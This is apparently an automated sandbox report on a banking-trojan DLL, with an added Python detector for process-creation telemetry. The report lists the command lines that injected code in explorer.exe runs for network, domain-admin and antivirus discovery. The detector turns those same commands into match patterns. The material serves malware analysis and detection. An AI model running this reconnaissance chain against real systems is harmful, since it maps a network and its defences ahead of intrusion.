Source: C:\Windows\explorer.exe Code function: 8_2_0885C704 NtDelayExecution, 8_2_0885C704
Source: C:\Windows\explorer.exe Code function: 8_2_0E45241C NtAllocateVirtualMemory, 8_2_0E45241C
Source: C:\Windows\explorer.exe Code function: 8_2_0E45248C NtFreeVirtualMemory, 8_2_0E45248C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D56B7C: CreateFileW,DeviceIoControl,CloseHandle, 3_2_00007FF8A8D56B7C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFDA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle, 3_2_00007FF8A8CFDA48
Source: C:\Windows\explorer.exe Code function: 8_2_0E454B50 8_2_0E454B50
Source: C:\Windows\explorer.exe Code function: 8_2_0E4E9708 8_2_0E4E9708
Source: C:\Windows\explorer.exe Code function: 8_2_0E46FE38 8_2_0E46FE38
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B1ECC 8_2_0E4B1ECC
Source: C:\Windows\explorer.exe Code function: 8_2_0E4E0EC0 8_2_0E4E0EC0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4A7EE8 8_2_0E4A7EE8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4EAE84 8_2_0E4EAE84
Source: C:\Windows\explorer.exe Code function: 8_2_0E45BEB8 8_2_0E45BEB8
Source: C:\Windows\explorer.exe Code function: 8_2_0E499F68 8_2_0E499F68
Source: C:\Windows\explorer.exe Code function: 8_2_0E4CAF20 8_2_0E4CAF20
Source: C:\Windows\explorer.exe Code function: 8_2_0E457FD0 8_2_0E457FD0
Source: C:\Windows\explorer.exe Code function: 8_2_0E47FC72 8_2_0E47FC72
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B7C14 8_2_0E4B7C14
Source: C:\Windows\explorer.exe Code function: 8_2_0E459CBC 8_2_0E459CBC
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C5D68 8_2_0E4C5D68
Source: C:\Windows\explorer.exe Code function: 8_2_0E480D18 8_2_0E480D18
Source: C:\Windows\explorer.exe Code function: 8_2_0E48EDE0 8_2_0E48EDE0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4A8DF8 8_2_0E4A8DF8
Source: C:\Windows\explorer.exe Code function: 8_2_0E479D94 8_2_0E479D94
Source: C:\Windows\explorer.exe Code function: 8_2_0E4E9D94 8_2_0E4E9D94
Source: C:\Windows\explorer.exe Code function: 8_2_0E480A8A 8_2_0E480A8A
Source: C:\Windows\explorer.exe Code function: 8_2_0E49EA84 8_2_0E49EA84
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C0B54 8_2_0E4C0B54
Source: C:\Windows\explorer.exe Code function: 8_2_0E4D2B38 8_2_0E4D2B38
Source: C:\Windows\explorer.exe Code function: 8_2_0E4DDB34 8_2_0E4DDB34
Source: C:\Windows\explorer.exe Code function: 8_2_0E49BB94 8_2_0E49BB94
Source: C:\Windows\explorer.exe Code function: 8_2_0E4EEBB8 8_2_0E4EEBB8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B7874 8_2_0E4B7874
Source: C:\Windows\explorer.exe Code function: 8_2_0E4A481C 8_2_0E4A481C
Source: C:\Windows\explorer.exe Code function: 8_2_0E488824 8_2_0E488824
Source: C:\Windows\explorer.exe Code function: 8_2_0E48D834 8_2_0E48D834
Source: C:\Windows\explorer.exe Code function: 8_2_0E4DD8B8 8_2_0E4DD8B8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C98B0 8_2_0E4C98B0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4E4940 8_2_0E4E4940
Source: C:\Windows\explorer.exe Code function: 8_2_0E45D9E4 8_2_0E45D9E4
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C8980 8_2_0E4C8980
Source: C:\Windows\explorer.exe Code function: 8_2_0E479650 8_2_0E479650
Source: C:\Windows\explorer.exe Code function: 8_2_0E4DD63C 8_2_0E4DD63C
Source: C:\Windows\explorer.exe Code function: 8_2_0E475768 8_2_0E475768
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C672C 8_2_0E4C672C
Source: C:\Windows\explorer.exe Code function: 8_2_0E4677E0 8_2_0E4677E0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B8788 8_2_0E4B8788
Source: C:\Windows\explorer.exe Code function: 8_2_0E4A7448 8_2_0E4A7448
Source: C:\Windows\explorer.exe Code function: 8_2_0E4AE45C 8_2_0E4AE45C
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C2430 8_2_0E4C2430
Source: C:\Windows\explorer.exe Code function: 8_2_0E49F4C4 8_2_0E49F4C4
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B84D8 8_2_0E4B84D8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4D94F0 8_2_0E4D94F0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B3498 8_2_0E4B3498
Source: C:\Windows\explorer.exe Code function: 8_2_0E470540 8_2_0E470540
Source: C:\Windows\explorer.exe Code function: 8_2_0E458568 8_2_0E458568
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B4564 8_2_0E4B4564
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C5534 8_2_0E4C5534
Source: C:\Windows\explorer.exe Code function: 8_2_0E45453C 8_2_0E45453C
Source: C:\Windows\explorer.exe Code function: 8_2_0E49B5D0 8_2_0E49B5D0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B05FC 8_2_0E4B05FC
Source: C:\Windows\explorer.exe Code function: 8_2_0E47F5FB 8_2_0E47F5FB
Source: C:\Windows\explorer.exe Code function: 8_2_0E4805A0 8_2_0E4805A0
Source: C:\Windows\explorer.exe Code function: 8_2_0E456358 8_2_0E456358
Source: C:\Windows\explorer.exe Code function: 8_2_0E4DB370 8_2_0E4DB370
Source: C:\Windows\explorer.exe Code function: 8_2_0E45E31C 8_2_0E45E31C
Source: C:\Windows\explorer.exe Code function: 8_2_0E4983EC 8_2_0E4983EC
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C73A0 8_2_0E4C73A0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4BA048 8_2_0E4BA048
Source: C:\Windows\explorer.exe Code function: 8_2_0E48E074 8_2_0E48E074
Source: C:\Windows\explorer.exe Code function: 8_2_0E456078 8_2_0E456078
Source: C:\Windows\explorer.exe Code function: 8_2_0E4AF018 8_2_0E4AF018
Source: C:\Windows\explorer.exe Code function: 8_2_0E476038 8_2_0E476038
Source: C:\Windows\explorer.exe Code function: 8_2_0E4970C0 8_2_0E4970C0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C0154 8_2_0E4C0154
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B0114 8_2_0E4B0114
Source: C:\Windows\explorer.exe Code function: 8_2_0E4C4134 8_2_0E4C4134
Source: C:\Windows\explorer.exe Code function: 8_2_0E4B11CC 8_2_0E4B11CC
Source: C:\Windows\explorer.exe Code function: 8_2_0E4851C0 8_2_0E4851C0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4801FB 8_2_0E4801FB
Source: C:\Windows\explorer.exe Code function: 8_2_0E4A318C 8_2_0E4A318C
Source: C:\Windows\explorer.exe Code function: 8_2_0E46D19C 8_2_0E46D19C
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8DC9868 appears 296 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8D0F210 appears 62 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8DC9670 appears 61 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8D0C6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8D0ECA0 appears 394 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 00007FF8A8CFE038 appears 69 times
Source: C:\Windows\explorer.exe Code function: String function: 0E477D54 appears 31 times
Source: C:\Windows\explorer.exe Code function: String function: 0E45E160 appears 147 times
Source: C:\Windows\explorer.exe Code function: String function: 0E45D5A8 appears 35 times
Source: C:\Windows\explorer.exe Code function: String function: 0E45D6E8 appears 52 times
Source: wait.dll.dll Binary or memory string: OriginalFilenamenvsvc32.exez- vs wait.dll.dll
Source: classification engine Classification label: mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D7CB80 LoadLibraryW,GetLastError,swprintf,FormatMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 3_2_00007FF8A8D7CB80
Source: C:\Windows\System32\rundll32.exe Code function: 3_3_00007DF4A9FC0000 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next, 3_3_00007DF4A9FC0000
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D2C180 CoCreateInstance,StringFromGUID2,RegQueryInfoKeyW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegCloseKey, 3_2_00007FF8A8D2C180
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFEA34 LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 3_2_00007FF8A8CFEA34
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stkm[1].bin
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Iyufla1.tmp
Source: wait.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
Source: Iyufla1.tmp.8.dr, Alakow3.tmp.8.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami /groups
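The process-creation evidence above is the detection opportunity a defender cares about more than any single command: none of ipconfig, systeminfo, nltest, net view, net group "Domain Admins", net config workstation, the SecurityCenter2 WMI query or whoami /groups is malicious on its own, but all of them launched in quick succession from explorer.exe (which is hosting injected code here, not a user's shell) is. The following is an added example written for this page, not code from Joe Sandbox or from the report; it runs a parent-plus-burst check over constructed Sysmon-style process-creation records in an assumed "ts|parent_image|parent_pid|image|command_line" form. The category regexes, the 120-second window, the three-distinct-commands threshold and the list of unexpected parents are all assumptions to tune for your own telemetry.

```python
import re
from collections import defaultdict

# Discovery commands as they appear in the process tree of this report.
# Matched case-insensitively against the command line; net1.exe is the
# helper that net.exe hands "group"/"config" off to, so it is allowed too.
RECON_PATTERNS = {
    "ipconfig_all":  r"\bipconfig(?:\.exe)?\s+/all\b",
    "systeminfo":    r"\bsysteminfo(?:\.exe)?\b",
    "nltest_trusts": r"\bnltest(?:\.exe)?\s+/domain_trusts\b",
    "net_view":      r"\bnet1?(?:\.exe)?\s+view\b",
    "net_group_da":  r'\bnet1?(?:\.exe)?\s+group\s+"domain admins"',
    "net_config_ws": r"\bnet1?(?:\.exe)?\s+config\s+workstation\b",
    "wmic_av":       r"securitycenter2.*antivirusproduct",
    "whoami_groups": r"\bwhoami(?:\.exe)?\s+/groups\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RECON_PATTERNS.items()}

# Parents from which a burst of these commands is not expected (assumption).
# explorer.exe is listed because the report shows it running injected code;
# an admin typing commands would normally have cmd.exe/powershell.exe as parent.
SUSPICIOUS_PARENTS = {"explorer.exe"}


def classify(cmdline):
    """Return the set of recon categories a command line matches (may be empty)."""
    return {name for name, rx in COMPILED.items() if rx.search(cmdline)}


def parse_event(line):
    """Parse one constructed 'ts|parent_image|parent_pid|image|command_line' record.
    maxsplit=4 keeps pipes inside the command line (e.g. 'wmic ... | findstr ...')."""
    ts, parent_image, parent_pid, image, cmdline = line.split("|", 4)
    return {
        "ts": int(ts),
        "parent_image": parent_image.rsplit("\\", 1)[-1].lower(),
        "parent_pid": int(parent_pid),
        "image": image.rsplit("\\", 1)[-1].lower(),
        "cmdline": cmdline,
    }


def detect_recon_burst(lines, window_s=120, min_distinct=3):
    """Alert when one suspicious parent process launches at least min_distinct
    distinct recon categories within window_s seconds. One alert per parent."""
    hits = defaultdict(list)  # (parent_image, parent_pid) -> [(ts, category), ...]
    for line in lines:
        ev = parse_event(line)
        if ev["parent_image"] not in SUSPICIOUS_PARENTS:
            continue
        for cat in classify(ev["cmdline"]):
            hits[(ev["parent_image"], ev["parent_pid"])].append((ev["ts"], cat))

    alerts = []
    for (parent, pid), events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # sliding window start
            cats = {c for t, c in events[i:] if t - t0 <= window_s}
            if len(cats) >= min_distinct:
                alerts.append({"parent": parent, "pid": pid,
                               "start": t0, "categories": sorted(cats)})
                break
    return alerts


# Constructed sample records modelled on the report's process tree. PIDs and
# timestamps are invented; the command lines are the ones listed above.
SAMPLE_EVENTS = [
    "1000|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c ipconfig /all",
    "1003|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c systeminfo",
    "1008|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c nltest /domain_trusts /all_trusts",
    "1012|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c net view /all /domain",
    "1015|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c net group \"Domain Admins\" /domain",
    "1020|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List",
    "1022|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed",
    "1024|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c net config workstation",
    "1030|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami /groups",
    # benign noise: an interactive admin shell running a single command
    "1100|C:\\Windows\\System32\\cmd.exe|700|C:\\Windows\\System32\\ipconfig.exe|ipconfig /all",
    # explorer launching a normal application, and one lone systeminfo (below threshold)
    "1200|C:\\Windows\\explorer.exe|4560|C:\\Windows\\System32\\notepad.exe|notepad.exe",
    "1300|C:\\Windows\\explorer.exe|9999|C:\\Windows\\System32\\cmd.exe|cmd.exe /c systeminfo",
]

if __name__ == "__main__":
    for alert in detect_recon_burst(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed records this raises exactly one alert, for explorer.exe PID 4560 with all eight categories, and stays silent for the admin's lone ipconfig and for the single systeminfo from the other explorer.exe instance. In production, feed it Sysmon Event ID 1 (or the EDR equivalent) and extend SUSPICIOUS_PARENTS with other processes that should never spawn shells in your environment; the same burst logic also catches the variant where the operator changes the individual command syntax but not the pattern.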
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: userenv.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\loaddll64.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: webio.dll
Source: C:\Windows\explorer.exe Section loaded: mozglue.dll
Source: C:\Windows\explorer.exe Section loaded: wsock32.dll
Source: C:\Windows\explorer.exe Section loaded: vaultcli.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
